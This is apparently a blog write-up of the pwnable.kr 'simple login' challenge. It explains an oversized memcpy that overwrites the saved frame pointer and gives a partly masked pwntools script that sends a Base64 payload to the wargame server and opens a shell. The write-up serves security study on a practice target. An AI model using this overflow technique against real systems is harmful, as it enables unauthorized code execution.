December 13, 2017

pwnable.kr simple login write-up

Description of pwnable.kr simple login write-up

Can you get authentication from this server?




executing test of pwnable.kr simple login write-up

The above image is the screen when executed.

It is a program that prints a hash value when a any value is inputed. However, when I inputed the same values, different hash values are printed.




main function of pwnable.kr simple login write-up

This is the decompiled main() function. The Base64Decode() function is the same function as in the previous chellange(Link). This function decodes the value in v5 into Base64, stores it in v4, and returns the length of the decoded string.

If the length of the decoded value exceeds 12, the program is terminated.

The decoded value v4 is stored in the global variable "input" and the auth() function is called. If the auth() function returns 1, the correct () function is called.




correct function of pwnable.kr simple login

The correct() function is a function that executes the bourne shell when the value of the input variable is 0xDEADBEEF.




auth function of pwnable.kr simple login

The auth() function generates an md5 value and checks whether the generated value is equal to f87 ~ 34.

memcpy() is a bit strange. The variable "input" can store up to 12 Bytes, but v4 of auth() can store up to 4 Bytes. Here a buffer overflow occurs.

Since the distance between v4 and ebp is 8, if a 12 Bytes value is inputed, the SFP of the stack frame will be overwritten. refer to stack frame structure(Link).

If auth() is returned and main() is returned, eventually EIP is modified.




<te.py>
from pwn import *

payload = b64e("\xef\xbe■■■■■"+"■■■■■■■■■"+"■■■■■■■■■■")
print len(payload)

#with process("./login") as pkr:
with remote("pwnable.kr", 9003) as pkr:
    pkr.send(payload + "\n")
    print pkr.recvline()
    print pkr.recvline()
    pkr.interactive()
* Some are masked

This is the code for the exploit. This code works as follows. Referencing the stack frame status at the time of function call(Link) and return(Link) will help you to configure the payload.

[Operation order associated with the payload]
1. Return of auth() : The address of the "input" is stored in ebp.
2. Return of main() : The address of the "input" is stored in esp.
3. POP ebp : 0xdeadbeef is stored in ebp.
4. RET : The address of ■■■■■ is sotred in ■■■■.




getting the flag of pwnable.kr simple login

The flag is obtained successfully.